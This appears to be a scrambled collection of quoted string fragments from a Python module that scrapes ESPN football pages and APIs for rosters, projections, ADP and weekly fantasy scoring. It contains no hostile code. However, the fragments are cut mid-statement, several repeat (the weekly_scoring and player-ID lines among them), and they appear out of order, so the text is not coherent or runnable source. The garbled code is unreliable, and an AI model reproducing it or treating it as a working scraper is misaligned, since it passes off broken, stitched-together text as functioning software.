players.append(player) except ValueError: pass return players @staticmethod def weekly_scoring(content): \"\"\" Parses", "\"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec\", \"rec_yds\", \"rec_td\", \"fantasy_points_ppr\", ] for row", "\"LAR\", 15: \"Mia\", 16: \"Min\", 17: \"NE\", 18: \"NO\", 19: \"NYG\", 20: \"NYJ\",", "\"flex\"]: headers = [ \"pass_att\", \"pass_cmp\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec\",", "= tds[2].text player[\"source_player_name\"] = link.text player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2] players.append(player) except ValueError: pass return", "soup.find_all(\"tr\"): class_matches = set([\"oddrow\", \"evenrow\"]) classes = set(row.attrs.get(\"class\", [])) if class_matches.intersection(classes): player =", "adp(content): \"\"\" Parses season-long ADP Args: content: Returns: list of dict \"\"\" vals", "player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2] players.append(player) except ValueError: pass return players @staticmethod def weekly_scoring(content): \"\"\"", "= {\"qb\": 120, \"rb\": 240, \"wr\": 360, \"te\": 160, \"dst\": 0, \"k\": 40}", "\"Min\", 17: \"NE\", 18: \"NO\", 19: \"NYG\", 20: \"NYJ\", 21: \"Phi\", 22: \"Ari\",", "BeautifulSoup(content, \"lxml\") if pos.lower() in [\"qb\", \"rb\", \"wr\", \"te\", \"flex\"]: headers = [", "40} if pos not in slot_categories.keys(): raise ValueError(\"invalid pos {}\".format(pos)) if offset >", "{\"source\": \"espn\"} tds = row.find_all(\"td\") # tds[0]: rank player[\"source_position_rank\"] = tds[0].text # tds[1]:", "revise based on new URL \"\"\" pos = pos.lower() slot_categories = {\"qb\": 0,", "\"rb\", \"wr\", \"te\", \"dst\", \"d/st\", \"k\", \"QB\", \"RB\", \"WR\", \"TE\", \"K\", \"D/ST\", \"DST\",", "{ 1: \"Atl\", 2: \"Buf\", 3: \"Chi\", 4: \"Cin\", 5: \"Cle\", 6: \"Dal\",", "is valid and uppercase Args: pos(str): Returns: str \"\"\" if pos in [", "HTML TODO: rework for new URL \"\"\" poscode = {\"qb\": 0, \"rb\": 2,", "page with projections by position Args: pos: str qb, rb, wr, te, k,", "scoring_type.lower() + \"_\" + rank_type try: api_player[key] = item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type] except KeyError:", "wr, te, k, etc. season_year: int 2017, 2016 week: int 1, 2, 3", "have to remove & split vals = [self._val(td.text) for td in tds[3:]] for", "player[\"source_player_id\"] = match.group(1) # tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] = tds[1].text link", "season_year=None, week=0, offset=0): \"\"\" Gets page with projections by position Args: pos: str", "& split player[\"fantasy_points_ppr\"] = self._val(tds[-1].text) players.append(player) else: pass return players @staticmethod def players_position(content,", "[ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec_rec\", \"rec_yds\", \"rec_td\", \"rec_tar\", \"tpc\",", "Args: pos: str qb, rb, wr, te, k, etc. season_year: int 2017, 2016", "from sportscraper.scraper import RequestScraper FANTASY_TEAMS = { 1: \"Atl\", 2: \"Buf\", 3: \"Chi\",", "\"--\" in val: return 0 return val @staticmethod def adp(content): \"\"\" Parses season-long", "\"tpc\", \"fumble\", \"misc_td\", \"fpts\", ] soup = BeautifulSoup(content, \"lxml\") tbl = soup.select(\"table#playertable_0\")[0] for", "link = row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")}) try: player = {\"source\": \"espn\"} tds = row.find_all(\"td\")", "> max_offset.get(pos): raise ValueError(\"invalid offset {}\".format(offset)) if offset % 40 > 0: raise", "in one column so have to remove & split vals = [self._val(td.text) for", "Returns: list: of dict \"\"\" # TODO: adapt for dst results = []", "fantasy data # espn_fantasy is mostly about managing fantasy teams # NOTE: trouble", "player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results class Agent: \"\"\" Combines", "offset > max_offset.get(pos): raise ValueError(\"invalid offset {}\".format(offset)) if offset % 40 > 0:", "= row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")}) if link: match = re.search(r\"name/(\\w+)/\", link[\"href\"]) if match: player[\"source_team_code\"]", "offset {}\".format(offset)) if offset % 40 > 0: raise ValueError(\"invalid offset {}\".format(offset)) #", "2, 3 offset: int 0, 40, 80, etc. Returns: HTML string TODO: revise", "@staticmethod def _check_pos(pos): \"\"\" Makes sure pos is valid and uppercase Args: pos(str):", "self.get(url, params=params, encoding=\"latin1\") def team_roster(self, team_code): \"\"\" Gets list of NFL players from", "\"_\" + rank_type try: api_player[key] = item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type] except KeyError: api_player[key] =", "_check_pos(pos): \"\"\" Makes sure pos is valid and uppercase Args: pos(str): Returns: str", "to list players.append(player) return players @staticmethod def team_roster(content): \"\"\" Parses team roster page", "\"\"\" Makes sure pos is valid and uppercase Args: pos(str): Returns: str \"\"\"", "= row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")}) if link: match = re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if match: player[\"source_player_id\"]", "parsing espn football data # this does include some basic fantasy data #", "adp data Args: season_year(int): 2019, etc. Returns: dict: parsed JSON \"\"\" url =", "namematcher.xref import Site from sportscraper.scraper import RequestScraper FANTASY_TEAMS = { 1: \"Atl\", 2:", "\"te\", \"dst\", \"d/st\", \"k\", \"QB\", \"RB\", \"WR\", \"TE\", \"K\", \"D/ST\", \"DST\", ]: if", "% 40 > 0: raise ValueError(\"invalid offset {}\".format(offset)) # https://fantasy.espn.com/football/players/projections url = \"http://games.espn.com/ffl/tools/projections?\"", "[\"qb\", \"rb\", \"wr\", \"te\", \"flex\"]: headers = [ \"pass_att\", \"pass_cmp\", \"pass_yds\", \"pass_td\", \"pass_int\",", "\"Chi\", 4: \"Cin\", 5: \"Cle\", 6: \"Dal\", 7: \"Den\", 8: \"Det\", 9: \"GB\",", "data # this does include some basic fantasy data # espn_fantasy is mostly", "= scoring_type.lower() + \"_\" + rank_type try: api_player[key] = item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type] except", "self._p = parser else: self._p = Parser() def adp(self, season_year): \"\"\" Gets season", "\"\"\" vals = [] for item in content[\"players\"]: tl_wanted = [ \"defaultPositionId\", \"firstName\",", "= {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17}", "api_player = {k: v for k, v in item[\"player\"].items() if k in tl_wanted}", "NavigableString): player[\"source_player_team\"], player[ \"source_player_position\" ] = child.string.split()[1:3] elif isinstance(child, Tag): player[\"source_player_name\"] = child.string", "player = {\"source\": \"espn\"} tds = row.find_all(\"td\") if len(tds) != 8: continue player[\"source_player_position\"]", "Makes sure pos is valid and uppercase Args: pos(str): Returns: str \"\"\" if", "api_player[key] = item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type] except KeyError: api_player[key] = None vals.append(api_player) return vals", "else: pass return players @staticmethod def players_position(content, pos): \"\"\" Parses page of ESPN", "# classes for scraping, parsing espn football data # this does include some", "position Args: content: pos: Returns: list: of dict \"\"\" players = [] soup", "this module as season approaches \"\"\" import logging import re from bs4 import", "page Returns: list of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\")", "in soup.find_all(\"tr\"): class_matches = set([\"oddrow\", \"evenrow\"]) classes = set(row.attrs.get(\"class\", [])) if class_matches.intersection(classes): player", "in nametd.children: if isinstance(child, NavigableString): player[\"source_player_team\"], player[ \"source_player_position\" ] = child.string.split()[1:3] elif isinstance(child,", "results.append(player) return results @staticmethod def weekly_scoring_dst(content): \"\"\" Parses weekly scoring page for dst", "else: self._s = Scraper(cache_name=cache_name) if parser: self._p = parser else: self._p = Parser()", "\"Ari\", 23: \"Pit\", 24: \"LAC\", 25: \"SF\", 26: \"Sea\", 27: \"TB\", 28: \"Wsh\",", "they have attempts/completions in one column so have to remove & split vals", "link[\"href\"]) if match: player[\"source_team_code\"] = match.group(1) # tds[2]: <td>Arkansas</td> player[\"college\"] = tds[2].text #", "list players.append(player) return players @staticmethod def team_roster(content): \"\"\" Parses team roster page into", "pos in [ \"qb\", \"rb\", \"wr\", \"te\", \"dst\", \"d/st\", \"k\", \"QB\", \"RB\", \"WR\",", "17} if position.lower() not in poscode: raise ValueError(\"invalid position: {}\".format(position)) # https://fantasy.espn.com/football/leaders url", "week else: params[\"seasonTotals\"] = \"true\" return self.get(url, params=params, encoding=\"latin1\") def team_roster(self, team_code): \"\"\"", "= set(row.attrs.get(\"class\", [])) if class_matches.intersection(classes): player = {\"source\": \"espn\", \"source_player_position\": pos} tds =", "= match.group(1) # tds[2]: <td>Arkansas</td> player[\"college\"] = tds[2].text # add to list players.append(player)", "poscode = {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\":", "Args: content: pos: Returns: list: of dict \"\"\" players = [] soup =", "\"GB\", 10: \"Ten\", 11: \"Ind\", 12: \"KC\", 13: \"Oak\", 14: \"LAR\", 15: \"Mia\",", "to remove & split vals = [self._val(td.text) for td in tds[3:]] for header,", "self.get(url.format(pos), encoding=\"latin1\") def projections(self, pos, season_year=None, week=0, offset=0): \"\"\" Gets page with projections", "soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): link = row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")})", "match: player[\"source_team_code\"] = match.group(1) # tds[2]: <td>Arkansas</td> player[\"college\"] = tds[2].text # add to", "raise ValueError(\"invalid pos {}\".format(pos)) if offset > max_offset.get(pos): raise ValueError(\"invalid offset {}\".format(offset)) if", "\"dst\", \"d/st\", \"k\", \"QB\", \"RB\", \"WR\", \"TE\", \"K\", \"D/ST\", \"DST\", ]: if pos", "football season-long sortable projections page Args: content: HTML string Returns: list of dict", "{k: v for k, v in item[\"player\"].items() if k in tl_wanted} for scoring_type", "trouble accessing data in offseason # will have to revisit this module as", "21: \"Phi\", 22: \"Ari\", 23: \"Pit\", 24: \"LAC\", 25: \"SF\", 26: \"Sea\", 27:", "rank_type in [\"rank\", \"auctionValue\"]: key = scoring_type.lower() + \"_\" + rank_type try: api_player[key]", "Parses page of ESPN players by position Args: content: pos: Returns: list: of", "players @staticmethod def weekly_scoring(content): \"\"\" Parses weekly scoring page Args: content (str): HTML", "etc. Returns: str \"\"\" url = \"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos), encoding=\"latin1\") def projections(self, pos,", "17: \"NE\", 18: \"NO\", 19: \"NYG\", 20: \"NYJ\", 21: \"Phi\", 22: \"Ari\", 23:", "None vals.append(api_player) return vals def projections(self, content, pos): \"\"\" Parses ESPN fantasy football", "17 position (str): 'qb', 'wr', etc. Returns: str: HTML TODO: rework for new", "split vals = [self._val(td.text) for td in tds[3:]] for header, val in zip(headers,", "[] for item in content[\"players\"]: tl_wanted = [ \"defaultPositionId\", \"firstName\", \"id\", \"lastName\", \"proTeamId\",", "nametd.children: if isinstance(child, NavigableString): player[\"source_player_team\"], player[ \"source_player_position\" ] = child.string.split()[1:3] elif isinstance(child, Tag):", "new URL \"\"\" poscode = {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6,", "pos.upper() else: raise ValueError(\"invalid position: {}\".format(pos)) def adp(self, season_year): \"\"\" Gets adp data", "content (str): HTML Returns: list: of dict \"\"\" results = [] headers =", "params = { \"scoringPeriodId\": week, \"seasonId\": season_year, \"slotCategoryId\": position, } return self.get(url, params=params)", "week (int): 1 through 17 position (str): 'qb', 'wr', etc. Returns: str: HTML", "cache_name(str): default 'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper: self._s = scraper else: self._s =", "def adp(content): \"\"\" Parses season-long ADP Args: content: Returns: list of dict \"\"\"", "player[ \"source_player_position\" ] = navstr.split()[-2:] player[\"source_player_id\"] = link.attrs.get(\"playerid\") # loop through stats #", "2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17} if position.lower() not in", "] api_player = {k: v for k, v in item[\"player\"].items() if k in", "offset % 40 > 0: raise ValueError(\"invalid offset {}\".format(offset)) # https://fantasy.espn.com/football/players/projections url =", "raise ValueError(\"invalid position: {}\".format(position)) # https://fantasy.espn.com/football/leaders url = \"http://games.espn.com/ffl/leaders?&\" params = { \"scoringPeriodId\":", "class Parser: \"\"\" Parse ESPN.com for football stats \"\"\" def __init__(self): \"\"\" \"\"\"", "kicker results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\",", "16, \"k\": 17} max_offset = {\"qb\": 120, \"rb\": 240, \"wr\": 360, \"te\": 160,", "logging import re from bs4 import BeautifulSoup, NavigableString, Tag from namematcher.xref import Site", "[\"DST\", \"dst\"]: pos = \"D/ST\" return pos.upper() else: raise ValueError(\"invalid position: {}\".format(pos)) def", "{\"qb\": 120, \"rb\": 240, \"wr\": 360, \"te\": 160, \"dst\": 0, \"k\": 40} if", "Parses weekly scoring page for kickers Args: content (str): HTML Returns: list: of", "\"\"\" def __init__(self): \"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def _val(val): \"\"\" Converts non-numeric value", "position.lower() not in poscode: raise ValueError(\"invalid position: {}\".format(position)) # https://fantasy.espn.com/football/leaders url = \"http://games.espn.com/ffl/leaders?&\"", "for td in row.find_all(\"td\", class_=\"playertableStat\")] if tds: player = dict(zip(headers, tds)) # name,", "\"\"\" Parses weekly scoring page for kickers Args: content (str): HTML Returns: list:", "params=params, encoding=\"latin1\") def team_roster(self, team_code): \"\"\" Gets list of NFL players from ESPN.com", "2019, etc. Returns: dict: parsed JSON \"\"\" url = ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" )", "player = {\"source\": \"espn\"} tds = row.find_all(\"td\") # tds[0]: rank player[\"source_position_rank\"] = tds[0].text", "\"Bal\", 34: \"Hou\", } class Scraper(RequestScraper): \"\"\" Scrape ESPN.com for football stats \"\"\"", "# tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] = tds[0].text link = row.find(\"a\", {\"href\":", "re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if match: player[\"source_player_id\"] = match.group(1) # tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td>", "\"Buf\", 3: \"Chi\", 4: \"Cin\", 5: \"Cle\", 6: \"Dal\", 7: \"Den\", 8: \"Det\",", "dict(zip(headers, tds)) # name, team, position nametd = row.find(\"td\", {\"id\": re.compile(r\"playername\")}) for child", "= child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_dst(content): \"\"\" Parses weekly scoring page", "def adp(self, season_year): \"\"\" Gets season ADP data Args: season_year(int): 2018, 2019, etc.", "@staticmethod def adp(content): \"\"\" Parses season-long ADP Args: content: Returns: list of dict", "pos.lower() in [\"qb\", \"rb\", \"wr\", \"te\", \"flex\"]: headers = [ \"pass_att\", \"pass_cmp\", \"pass_yds\",", "if season_year: params = { \"slotCategoryId\": slot_categories[pos], \"startIndex\": offset, \"seasonId\": season_year, } else:", "\"seasonId\": season_year, } else: params = {\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset} if week: params[\"scoringPeriodId\"]", "etc. Returns: HTML string \"\"\" url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url, encoding=\"latin1\") def weekly_scoring(self,", "offset, \"seasonId\": season_year, } else: params = {\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset} if week:", "href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] = tds[1].text link = row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")}) if link:", "players = [] soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): link =", "adapt for kicker results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\",", "pos(str): Returns: str \"\"\" if pos in [ \"qb\", \"rb\", \"wr\", \"te\", \"dst\",", "][rank_type] except KeyError: api_player[key] = None vals.append(api_player) return vals def projections(self, content, pos):", "BeautifulSoup(content, \"lxml\") tbl = soup.select(\"table#playertable_0\")[0] for row in tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}): tds =", "in [ \"qb\", \"rb\", \"wr\", \"te\", \"dst\", \"d/st\", \"k\", \"QB\", \"RB\", \"WR\", \"TE\",", "{\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17} max_offset", "= None vals.append(api_player) return vals def projections(self, content, pos): \"\"\" Parses ESPN fantasy", "26: \"Sea\", 27: \"TB\", 28: \"Wsh\", 29: \"Car\", 30: \"Jax\", 33: \"Bal\", 34:", "= [ \"pass_att\", \"pass_cmp\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec\", \"rec_yds\", \"rec_td\",", "Parse ESPN.com for football stats \"\"\" def __init__(self): \"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def", "\"LAC\", 25: \"SF\", 26: \"Sea\", 27: \"TB\", 28: \"Wsh\", 29: \"Car\", 30: \"Jax\",", "\"source_player_position\" ] = navstr.split()[-2:] player[\"source_player_id\"] = link.attrs.get(\"playerid\") # loop through stats # they", "params[\"seasonTotals\"] = \"true\" return self.get(url, params=params, encoding=\"latin1\") def team_roster(self, team_code): \"\"\" Gets list", "= soup.select(\"table#playertable_0\")[0] for row in tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}): tds = [td.text for td", "import logging import re from bs4 import BeautifulSoup, NavigableString, Tag from namematcher.xref import", "'qb', 'wr', etc. Returns: str: HTML TODO: rework for new URL \"\"\" poscode", "Returns: list: of dict \"\"\" content = self._s.adp(season_year) return self._p.adp(content) class Xref(Site): \"\"\"", "HTML Returns: list: of dict \"\"\" results = [] headers = [ \"c_a\",", "player[\"source_player_name\"] = tds[0].text link = row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")}) if link: match = re.search(r\"\\/id\\/([0-9]+)\",", "(str): HTML Returns: list: of dict \"\"\" results = [] headers = [", "import RequestScraper FANTASY_TEAMS = { 1: \"Atl\", 2: \"Buf\", 3: \"Chi\", 4: \"Cin\",", "28: \"Wsh\", 29: \"Car\", 30: \"Jax\", 33: \"Bal\", 34: \"Hou\", } class Scraper(RequestScraper):", "Parses ESPN fantasy football season-long sortable projections page Args: content: HTML string Returns:", "season_year): \"\"\" Gets season ADP data Args: season_year(int): 2018, 2019, etc. Returns: list:", "\"wr\", \"te\", \"flex\"]: headers = [ \"pass_att\", \"pass_cmp\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\",", "if pos.lower() in [\"qb\", \"rb\", \"wr\", \"te\", \"flex\"]: headers = [ \"pass_att\", \"pass_cmp\",", "dict: parsed JSON \"\"\" url = ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return self.get_json(url) def", "Args: content(str): HTML Returns: list: of dict \"\"\" # TODO: adapt for dst", "season_year, \"slotCategoryId\": position, } return self.get(url, params=params) class Parser: \"\"\" Parse ESPN.com for", "\"rb\": 240, \"wr\": 360, \"te\": 160, \"dst\": 0, \"k\": 40} if pos not", "projections(self, content, pos): \"\"\" Parses ESPN fantasy football season-long sortable projections page Args:", "\"dst\": 16, \"k\": 17} max_offset = {\"qb\": 120, \"rb\": 240, \"wr\": 360, \"te\":", "raise ValueError(\"invalid position: {}\".format(pos)) def adp(self, season_year): \"\"\" Gets adp data Args: season_year(int):", "content = self._s.adp(season_year) return self._p.adp(content) class Xref(Site): \"\"\" Cross-reference source players with other", "te, k, etc. season_year: int 2017, 2016 week: int 1, 2, 3 offset:", "row in soup.find_all(\"tr\"): link = row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")}) try: player = {\"source\": \"espn\"}", "Gets list of NFL players from ESPN.com Args: team_code: str 'DEN', 'BUF', etc.", "\"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def _val(val): \"\"\" Converts non-numeric value to numeric 0 Args:", "for new URL \"\"\" poscode = {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\":", "29: \"Car\", 30: \"Jax\", 33: \"Bal\", 34: \"Hou\", } class Scraper(RequestScraper): \"\"\" Scrape", "NavigableString, Tag from namematcher.xref import Site from sportscraper.scraper import RequestScraper FANTASY_TEAMS = {", "23: \"Pit\", 24: \"LAC\", 25: \"SF\", 26: \"Sea\", 27: \"TB\", 28: \"Wsh\", 29:", "\"QB\", \"RB\", \"WR\", \"TE\", \"K\", \"D/ST\", \"DST\", ]: if pos in [\"DST\", \"dst\"]:", "0, 40, 80, etc. Returns: HTML string TODO: revise based on new URL", "TODO: rework for new URL \"\"\" poscode = {\"qb\": 0, \"rb\": 2, \"wr\":", "@staticmethod def _val(val): \"\"\" Converts non-numeric value to numeric 0 Args: val: Returns:", "0, \"k\": 40} if pos not in slot_categories.keys(): raise ValueError(\"invalid pos {}\".format(pos)) if", "\"lastName\", \"proTeamId\", ] api_player = {k: v for k, v in item[\"player\"].items() if", "0: raise ValueError(\"invalid offset {}\".format(offset)) # https://fantasy.espn.com/football/players/projections url = \"http://games.espn.com/ffl/tools/projections?\" if season_year: params", "player[\"source_position_rank\"] = tds[0].text # tds[1]: name/team/pos link, navstr = list(tds[1].children)[0:2] player[\"source_player_name\"] = link.text", "\"Cle\", 6: \"Dal\", 7: \"Den\", 8: \"Det\", 9: \"GB\", 10: \"Ten\", 11: \"Ind\",", "data in offseason # will have to revisit this module as season approaches", "KeyError: api_player[key] = None vals.append(api_player) return vals def projections(self, content, pos): \"\"\" Parses", "\"\"\" Args: source_name(str): either 'espn' or 'espn_fantasy' \"\"\" super().__init__() self.source_name = source_name if", "will have to revisit this module as season approaches \"\"\" import logging import", "\"Sea\", 27: \"TB\", 28: \"Wsh\", 29: \"Car\", 30: \"Jax\", 33: \"Bal\", 34: \"Hou\",", "row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")}) if link: match = re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if match: player[\"source_player_id\"] =", "dst Args: content(str): HTML Returns: list: of dict \"\"\" # TODO: adapt for", "= val players.append(player) elif pos.lower() == \"k\": for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}):", "Returns: list of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") for", "with projections by position Args: pos: str qb, rb, wr, te, k, etc.", "2017, 2016, etc. week (int): 1 through 17 position (str): 'qb', 'wr', etc.", "for scoring_type in [\"PPR\", \"STANDARD\"]: for rank_type in [\"rank\", \"auctionValue\"]: key = scoring_type.lower()", "{\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset} if week: params[\"scoringPeriodId\"] = week else: params[\"seasonTotals\"] = \"true\"", "Returns: list: of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") for", "def weekly_scoring(self, season_year, week, position): \"\"\" Gets weekly fantasy scoring page Args: season_year", "for child in nametd.children: if isinstance(child, NavigableString): player[\"source_player_team\"], player[ \"source_player_position\" ] = child.string.split()[1:3]", "{}\".format(offset)) if offset % 40 > 0: raise ValueError(\"invalid offset {}\".format(offset)) # https://fantasy.espn.com/football/players/projections", "# NOTE: trouble accessing data in offseason # will have to revisit this", "2016 week: int 1, 2, 3 offset: int 0, 40, 80, etc. Returns:", "row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")}) if link: match = re.search(r\"name/(\\w+)/\", link[\"href\"]) if match: player[\"source_team_code\"] =", "f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url, encoding=\"latin1\") def weekly_scoring(self, season_year, week, position): \"\"\" Gets weekly fantasy", "\"\"\" def __init__(self, source_name=\"espn\"): \"\"\" Args: source_name(str): either 'espn' or 'espn_fantasy' \"\"\" super().__init__()", "40 > 0: raise ValueError(\"invalid offset {}\".format(offset)) # https://fantasy.espn.com/football/players/projections url = \"http://games.espn.com/ffl/tools/projections?\" if", "if class_matches.intersection(classes): player = {\"source\": \"espn\", \"source_player_position\": pos} tds = row.find_all(\"td\") # tds[0]:", "# loop through stats # they have attempts/completions in one column so have", "Returns: HTML string \"\"\" url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url, encoding=\"latin1\") def weekly_scoring(self, season_year,", "= child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results class Agent: \"\"\" Combines common", "players by position Args: pos(str): qb, rb, wr, te, k, etc. Returns: str", "tds = row.find_all(\"td\") if len(tds) != 8: continue player[\"source_player_position\"] = tds[2].text player[\"source_player_name\"] =", "\"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): link", "player[\"source_player_name\"] = link.text player[\"source_player_team\"], player[ \"source_player_position\" ] = navstr.split()[-2:] player[\"source_player_id\"] = link.attrs.get(\"playerid\") #", "= match.group(1) # tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] = tds[1].text link =", "of dict \"\"\" content = self._s.adp(season_year) return self._p.adp(content) class Xref(Site): \"\"\" Cross-reference source", "def __init__(self, scraper=None, parser=None, cache_name=\"espn-agent\"): \"\"\" Creates Agent object Args: scraper(espn.Scraper): default None", "\"rush_att\", \"rush_yds\", \"rush_td\", \"rec\", \"rec_yds\", \"rec_td\", \"fantasy_points_ppr\", ] for row in soup.findAll(\"tr\", {\"class\":", "non-numeric value to numeric 0 Args: val: Returns: number \"\"\" if \"--\" in", "\"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17} max_offset = {\"qb\":", "item[\"player\"].items() if k in tl_wanted} for scoring_type in [\"PPR\", \"STANDARD\"]: for rank_type in", "\"pncPlayerRow\"}): player = {\"source\": \"espn\"} tds = row.find_all(\"td\") # tds[0]: rank player[\"source_position_rank\"] =", "[td.text for td in row.find_all(\"td\", class_=\"playertableStat\")] if tds: player = dict(zip(headers, tds)) #", "Gets season ADP data Args: season_year(int): 2018, 2019, etc. Returns: list: of dict", "pos} tds = row.find_all(\"td\") # tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] = tds[0].text", "2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17} max_offset = {\"qb\": 120,", "sortable projections page Args: content: HTML string Returns: list of dict \"\"\" players", "ValueError(\"invalid position: {}\".format(pos)) def adp(self, season_year): \"\"\" Gets adp data Args: season_year(int): 2019,", "slot_categories = {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\":", "link.text player[\"source_player_team\"], player[ \"source_player_position\" ] = navstr.split()[-2:] player[\"source_player_id\"] = link.attrs.get(\"playerid\") # loop through", "child in nametd.children: if isinstance(child, NavigableString): player[\"source_player_team\"], player[ \"source_player_position\" ] = child.string.split()[1:3] elif", "@staticmethod def team_roster(content): \"\"\" Parses team roster page into list of player dict", "max_offset = {\"qb\": 120, \"rb\": 240, \"wr\": 360, \"te\": 160, \"dst\": 0, \"k\":", "player[\"source_player_id\"] = link.attrs.get(\"playerid\") # loop through stats # they have attempts/completions in one", "have to remove & split player[\"fantasy_points_ppr\"] = self._val(tds[-1].text) players.append(player) else: pass return players", "] = navstr.split()[-2:] player[\"source_player_id\"] = link.attrs.get(\"playerid\") # loop through stats # they have", "tds)) # name, team, position nametd = row.find(\"td\", {\"id\": re.compile(r\"playername\")}) for child in", "offset=0): \"\"\" Gets page with projections by position Args: pos: str qb, rb,", "8: \"Det\", 9: \"GB\", 10: \"Ten\", 11: \"Ind\", 12: \"KC\", 13: \"Oak\", 14:", "ESPN fantasy football season-long sortable projections page Args: content: HTML string Returns: list", "\"lxml\") if pos.lower() in [\"qb\", \"rb\", \"wr\", \"te\", \"flex\"]: headers = [ \"pass_att\",", "# tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] = tds[1].text link = row.find(\"a\", {\"href\":", "= {k: v for k, v in item[\"player\"].items() if k in tl_wanted} for", "about managing fantasy teams # NOTE: trouble accessing data in offseason # will", "players @staticmethod def team_roster(content): \"\"\" Parses team roster page into list of player", "\"\"\" url = \"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos), encoding=\"latin1\") def projections(self, pos, season_year=None, week=0, offset=0):", "__init__(self): \"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def _val(val): \"\"\" Converts non-numeric value to numeric", "1, 2, 3 offset: int 0, 40, 80, etc. Returns: HTML string TODO:", "[\"rank\", \"auctionValue\"]: key = scoring_type.lower() + \"_\" + rank_type try: api_player[key] = item[\"player\"][\"draftRanksByRankType\"][", "None parser(espn.Parser): default None cache_name(str): default 'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper: self._s =", "players.append(player) except ValueError: pass return players @staticmethod def weekly_scoring(content): \"\"\" Parses weekly scoring", "= navstr.split()[-2:] player[\"source_player_id\"] = link.attrs.get(\"playerid\") # loop through stats # they have 